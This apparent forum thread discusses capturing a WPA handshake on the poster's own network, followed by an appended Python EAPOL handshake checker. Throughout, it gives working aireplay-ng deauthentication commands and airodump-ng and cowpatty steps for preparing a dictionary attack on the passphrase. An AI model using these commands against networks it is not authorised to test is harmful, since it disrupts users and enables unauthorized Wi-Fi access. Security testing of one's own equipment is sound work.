
Thread: can't manage to get this damn handshake

  1. #1
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    4

    Default can't manage to get this damn handshake

    hi :

    OS : backtrack4
    card : alfa 500
    AP : livebox (french popular AP) in the room next to mine
    station : my iphone, on my desk

    shell 1 :

    iwconfig : I can see that my card is wlan0
    airmon-ng wlan0 start : now it is called mon0
    airodump-ng mon0 : I can see a lot of networks, mine is on channel 10
    CTRL+C
    airodump-ng -w out -c 10 --bssid XX:XX:XX:XX:XX:XX mon0 : targeting my network
    shell 2

    aireplay-ng -0 0 -a XX:XX:XX:XX:XX:XX mon0
    after waiting a couple of seconds, I can see my iphone being disconnected, CTRL+C to stop the deauth attack
    my iphone is reconnecting

    no handshake

    tried more than 10 times, I have even disconnected and reconnected my iphone manually and tried to do it with a regular laptop instead of my iphone (you never know, apple could be using some weird handshake)

    still no handshake

    could you look at my capture file? : Index of /backtrack4/wpa

    thanks

  2. #2
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    4

    Default Re: can't manage to get this damn handshake

    problem solved :

    airodump and aircrack do not like the apple handshake
    I've tried with a laptop and I can get this handshake

    but for my iphone, airodump says no handshake, but if you use cowpatty, you'll see it

  3. #3
    Senior Member hypervista's Avatar
    Join Date
    Feb 2010
    Posts
    121

    Default Re: can't manage to get this damn handshake

    sliders_alpha - it appears you have a good WPA handshake in that file. Run the following command:

    Code:
    cowpatty -c -r out-01.cap
    You will see the message: "Collected all necessary data to mount crack against WPA/PSK passphrase."

    airodump-ng doesn't always display the "WPA Handshake Captured" message.

    You should run aircrack-ng or cowpatty on your out-01.cap file to see if you can break the passphrase. Way to go, you're almost there.

  4. #4
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    4

    Default Re: can't manage to get this damn handshake

    hypervista how can you tell whether a handshake is good or not? I'm using Wireshark to open the out-01.cap file that sliders_alpha posted. In which packet do you find the information required to know if the packet is good?


    thanks

  5. #5
    Junior Member
    Join Date
    Apr 2010
    Posts
    30

    Default Re: can't manage to get this damn handshake

    I found that this command helped me catch those handshakes

    aireplay-ng -0 30 -a (BSSID) -c (STATION MAC ADDRESS) Interface (e.g. wlan0)

    -0 (deauth attack)
    30 (30 times)

    PS.

    Might be enough with -0 5 as well...

    Good luck

  6. #6
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    4

    Default Re: can't manage to get this damn handshake

    it worked

    I made a "false" dictionary with my key inside and it found it

    thank you

  7. #7
    Senior Member hypervista's Avatar
    Join Date
    Feb 2010
    Posts
    121

    Default Re: can't manage to get this damn handshake

    Quote Originally Posted by hurtincho04 View Post
    hypervista how can you tell whether a handshake is good or not? I'm using Wireshark to open the out-01.cap file that sliders_alpha posted. In which packet do you find the information required to know if the packet is good?

    thanks
    Using cowpatty, you can determine if the .cap file has all the necessary information needed to mount a dictionary attack.

    Code:
    cowpatty -c -r <capture_file_name.cap>
    The output of this command will tell you whether you got the WPA handshake or not.

    Interestingly though, as sliders pointed out, when I ran aircrack-ng against the file, it reported that no WPA handshake was present, but cowpatty recognized it...

  8. #8
    Junior Member
    Join Date
    Apr 2010
    Posts
    30

    Default Re: can't manage to get this damn handshake

    Very interesting observation, I found several times that aircrack-ng did not recognize the handshake. So next time I'll be sure to try cowpatty.

    Thank you

  9. #9
    Good friend of the forums gunrunr's Avatar
    Join Date
    Jan 2010
    Location
    shining my spoon
    Posts
    265

    Default Re: can't manage to get this damn handshake

    can you just check the cap file with Wireshark and use the eapol filter to make sure both sides of the handshake are there?

  10. #10
    Senior Member hypervista's Avatar
    Join Date
    Feb 2010
    Posts
    121

    Default Re: can't manage to get this damn handshake

    Quote Originally Posted by gunrunr View Post
    can you just check the cap file with Wireshark and use the eapol filter to make sure the both sides of the handshake are there?
    Sure, but I'm lazy and prefer typing one simple cowpatty command as opposed to firing up wireshark, creating a filter, and reading the individual packets, but that's just me.
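
The check gunrunr and hypervista describe (both sides of the EAPOL exchange present, and enough of it for cowpatty -c to report a usable handshake), written out as an added example that is not from this thread or from the aircrack-ng/cowpatty projects. It classifies EAPOL-Key frames into 4-way handshake messages 1 to 4 from their Key Information flags; the MAC addresses and the zero-filled sample frames are constructed for the demonstration.

```python
import struct

# Key Information flag bits of an EAPOL-Key frame (IEEE 802.11i)
KEY_INSTALL, KEY_ACK, KEY_MIC, KEY_SECURE = 1 << 6, 1 << 7, 1 << 8, 1 << 9

def eapol_key_message(frame: bytes):
    """Return 1..4 for a 4-way handshake message, else None."""
    if len(frame) < 7 or frame[1] != 3:            # EAPOL packet type 3 = Key
        return None
    key_info = struct.unpack("!H", frame[5:7])[0]  # after descriptor type byte
    ack, mic = bool(key_info & KEY_ACK), bool(key_info & KEY_MIC)
    if ack and not mic:
        return 1                                   # AP -> STA, carries ANonce
    if ack and mic and key_info & KEY_INSTALL:
        return 3                                   # AP -> STA, carries GTK
    if mic and not ack:
        return 4 if key_info & KEY_SECURE else 2   # STA -> AP (M2 has SNonce)
    return None

def handshake_status(frames):
    """frames: iterable of (src, dst, eapol_bytes) for frames matching the
    'eapol' filter. Returns {(ap, sta): {...}} describing what was captured."""
    seen = {}
    for src, dst, frame in frames:
        msg = eapol_key_message(frame)
        if msg is None:
            continue
        ap, sta = (src, dst) if msg in (1, 3) else (dst, src)
        seen.setdefault((ap, sta), set()).add(msg)
    return {pair: {"messages": msgs,
                   # gunrunr's check: at least one frame from each side
                   "both_sides": bool(msgs & {1, 3}) and bool(msgs & {2, 4}),
                   # what cowpatty -c / aircrack-ng look for: the STA's
                   # MIC-bearing M2 together with an ANonce from M1 or M3
                   "complete": 2 in msgs and bool(msgs & {1, 3})}
            for pair, msgs in seen.items()}

def make_eapol_key(key_info: int) -> bytes:
    """Constructed minimal EAPOL-Key frame (v2, type Key, RSN descriptor 2);
    everything after Key Information is zero-filled, enough to classify."""
    body = b"\x02" + struct.pack("!H", key_info) + bytes(92)
    return b"\x02\x03" + struct.pack("!H", len(body)) + body

# Constructed sample: a full 4-way handshake between made-up addresses
AP, STA = "00:11:22:33:44:55", "aa:bb:cc:dd:ee:ff"
SAMPLE = [(AP, STA, make_eapol_key(0x008a)),   # M1: pairwise|ack
          (STA, AP, make_eapol_key(0x010a)),   # M2: pairwise|mic
          (AP, STA, make_eapol_key(0x13ca)),   # M3: install|ack|mic|secure|enc
          (STA, AP, make_eapol_key(0x030a))]   # M4: pairwise|mic|secure
```

For a real out-01.cap, feed handshake_status() the source and destination addresses and EAPOL payload of each frame that Wireshark's eapol filter shows (extracted with tshark or scapy); a pair showing only message 1 is the "deauth worked but no handshake" case from the first post.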
